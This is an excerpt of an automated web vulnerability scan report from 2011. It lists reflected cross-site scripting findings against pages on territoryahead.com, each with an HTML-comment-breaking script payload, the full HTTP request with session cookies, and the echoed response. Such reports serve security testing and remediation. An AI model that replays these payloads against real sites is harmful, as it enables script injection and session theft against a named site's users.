The value of REST URL parameter 1 is copied into an HTML comment. The payload 23442--><script>alert(1)</script>75d5204bd9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes23442--><script>alert(1)</script>75d5204bd9a/cleartext.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:52 GMT
Server: Apache
ETag: "AAAAS53+ij1"
Last-Modified: Wed, 02 Mar 2011 19:10:06 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3ffJmawSrSgAAGQksawAAAAa
REDIRECT_SCRIPT_URL: /includes23442--><script>alert(1)</script>75d5204bd9a/cleartext.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes23442-->
...[SNIP]...

1.11. http://www.territoryahead.com/includes/cleartext.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /includes/cleartext.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload dc4aa--><script>alert(1)</script>727cf567a8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/cleartext.jsdc4aa--><script>alert(1)</script>727cf567a8d HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:46 GMT
Server: Apache
ETag: "AAAAS53+jOA"
Last-Modified: Wed, 02 Mar 2011 19:10:09 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
e: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vXMQyqwSrRQAAHa3-jAAAAAB
REDIRECT_SCRIPT_URL: /includes/cleartext.jsdc4aa--><script>alert(1)</script>727cf567a8d
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/cleartext.jsdc4aa-->
...[SNIP]...

1.12. http://www.territoryahead.com/includes/cm/cmtaggingservices_TTA_top.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /includes/cm/cmtaggingservices_TTA_top.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload cd1bc--><script>alert(1)</script>6e9c8a53a22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includescd1bc--><script>alert(1)</script>6e9c8a53a22/cm/cmtaggingservices_TTA_top.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:34 GMT
Server: Apache
ETag: "AAAAS53+7iR"
Last-Modified: Wed, 02 Mar 2011 19:11:48 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 5BD6HKwSrSgAAF3TGJ4AAAAs
REDIRECT_SCRIPT_URL: /includescd1bc--><script>alert(1)</script>6e9c8a53a22/cm/cmtaggingservices_TTA_top.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includescd1bc-->
...[SNIP]...

1.13. http://www.territoryahead.com/includes/cm/cmtaggingservices_TTA_top.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /includes/cm/cmtaggingservices_TTA_top.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 5fe53--><script>alert(1)</script>b80f84d5127 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/cm5fe53--><script>alert(1)</script>b80f84d5127/cmtaggingservices_TTA_top.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:28 GMT
Server: Apache
ETag: "AAAAS53+8Eg"
Last-Modified: Wed, 02 Mar 2011 19:11:51 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...

Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: w4PmLawSrRQAAHbd-PkAAAAU
REDIRECT_SCRIPT_URL: /includes/cm5fe53--><script>alert(1)</script>b80f84d5127/cmtaggingservices_TTA_top.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/cm5fe53-->
...[SNIP]...

1.14. http://www.territoryahead.com/includes/cm/cmtaggingservices_TTA_top.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /includes/cm/cmtaggingservices_TTA_top.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 52cc1--><script>alert(1)</script>d72ed3d7b91 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/cm/cmtaggingservices_TTA_top.js52cc1--><script>alert(1)</script>d72ed3d7b91 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:30 GMT
Server: Apache
ETag: "AAAAS53+8nW"
Last-Modified: Wed, 02 Mar 2011 19:11:53 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: w6ZaiKwSrRQAABCYmxIAAAAW
REDIRECT_SCRIPT_URL: /includes/cm/cmtaggingservices_TTA_top.js52cc1--><script>alert(1)</script>d72ed3d7b91
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/cm/cmtaggingservices_TTA_top.js52cc1-->
...[SNIP]...

1.15. http://www.territoryahead.com/includes/flyopen.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /includes/flyopen.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6da5d--><script>alert(1)</script>b2e7355efaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes6da5d--><script>alert(1)</script>b2e7355efaa/flyopen.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:46 GMT
Server: Apache
ETag: "AAAAS53+hIw"
Last-Modified: Wed, 02 Mar 2011 19:10:00 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3Z8dxqwSrSgAAEGJaxgAAAAq
REDIRECT_SCRIPT_URL: /includes6da5d--><script>alert(1)</script>b2e7355efaa/flyopen.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes6da5d-->
...[SNIP]...

1.16. http://www.territoryahead.com/includes/flyopen.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /includes/flyopen.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload fc741--><script>alert(1)</script>de7cf9e5952 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/flyopen.jsfc741--><script>alert(1)</script>de7cf9e5952 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:43 GMT
Server: Apache
ETag: "AAAAS53+ikQ"
Last-Modified: Wed, 02 Mar 2011 19:10:06 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
kie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vUnTmqwSrRQAAFi69mAAAACx
REDIRECT_SCRIPT_URL: /includes/flyopen.jsfc741--><script>alert(1)</script>de7cf9e5952
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/flyopen.jsfc741-->
...[SNIP]...

1.17. http://www.territoryahead.com/includes/global_stylesheet.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /includes/global_stylesheet.css

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 1fe21--><script>alert(1)</script>7c4d4ef1df3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes1fe21--><script>alert(1)</script>7c4d4ef1df3/global_stylesheet.css HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:47 GMT
Server: Apache
ETag: "AAAAS53+hYl"
Last-Modified: Wed, 02 Mar 2011 19:10:01 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3a6TZqwSrSgAAB1Ei4kAAAAO
REDIRECT_SCRIPT_URL: /includes1fe21--><script>alert(1)</script>7c4d4ef1df3/global_stylesheet.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes1fe21-->
...[SNIP]...

1.18. http://www.territoryahead.com/includes/global_stylesheet.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /includes/global_stylesheet.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 917c4--><script>alert(1)</script>89015f79c43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/global_stylesheet.css917c4--><script>alert(1)</script>89015f79c43 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:44 GMT
Server: Apache
ETag: "AAAAS53+i18"
Last-Modified: Wed, 02 Mar 2011 19:10:07 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vVtb@6wSrRQAAC9kmpMAAAAN
REDIRECT_SCRIPT_URL: /includes/global_stylesheet.css917c4--><script>alert(1)</script>89015f79c43
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/global_stylesheet.css917c4-->
...[SNIP]...

1.19. http://www.territoryahead.com/includes/rollover.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /includes/rollover.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c4f83--><script>alert(1)</script>fa0e3cf38e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includesc4f83--><script>alert(1)</script>fa0e3cf38e0/rollover.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:38 GMT
Server: Apache
ETag: "AAAAS53+hX0"
Last-Modified: Wed, 02 Mar 2011 19:10:01 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vP@njawSrRQAAFhQzKgAAAA7
REDIRECT_SCRIPT_URL: /includesc4f83--><script>alert(1)</script>fa0e3cf38e0/rollover.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includesc4f83-->
...[SNIP]...

1.20. http://www.territoryahead.com/includes/rollover.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /includes/rollover.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload ebd43--><script>alert(1)</script>3e7cfa00cb5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/rollover.jsebd43--><script>alert(1)</script>3e7cfa00cb5 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:44 GMT
Server: Apache
ETag: "AAAAS53+i2F"
Last-Modified: Wed, 02 Mar 2011 19:10:07 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vVuxdKwSrRQAAHbC-PQAAAAL
REDIRECT_SCRIPT_URL: /includes/rollover.jsebd43--><script>alert(1)</script>3e7cfa00cb5
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/rollover.jsebd43-->
...[SNIP]...

1.21. http://www.territoryahead.com/includes/stylesheet.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /includes/stylesheet.css

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c35cb--><script>alert(1)</script>b622e254608 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includesc35cb--><script>alert(1)</script>b622e254608/stylesheet.css HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:47 GMT
Server: Apache
ETag: "AAAAS53+hX+"
Last-Modified: Wed, 02 Mar 2011 19:10:01 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3a3JsqwSrSgAAF3PGQcAAAAi
REDIRECT_SCRIPT_URL: /includesc35cb--><script>alert(1)</script>b622e254608/stylesheet.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includesc35cb-->
...[SNIP]...

1.22. http://www.territoryahead.com/includes/stylesheet.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /includes/stylesheet.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 2d5df--><script>alert(1)</script>5599c52e0f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/stylesheet.css2d5df--><script>alert(1)</script>5599c52e0f1 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:53 GMT
Server: Apache
ETag: "AAAAS53+i6W"
Last-Modified: Wed, 02 Mar 2011 19:10:08 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3g3blawSrSgAAAUBs64AAAAK
REDIRECT_SCRIPT_URL: /includes/stylesheet.css2d5df--><script>alert(1)</script>5599c52e0f1
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/stylesheet.css2d5df-->
...[SNIP]...

1.23. http://www.territoryahead.com/menu/milonic_src.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /menu/milonic_src.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6569c--><script>alert(1)</script>a940dcc002b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu6569c--><script>alert(1)</script>a940dcc002b/milonic_src.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:16:21 GMT
Server: Apache
ETag: "AAAAS53+rpS"
Last-Modified: Wed, 02 Mar 2011 19:10:43 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: v4GyqawSrRQAAE0Z@yUAAAAa
REDIRECT_SCRIPT_URL: /menu6569c--><script>alert(1)</script>a940dcc002b/milonic_src.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/menu6569c-->
...[SNIP]...

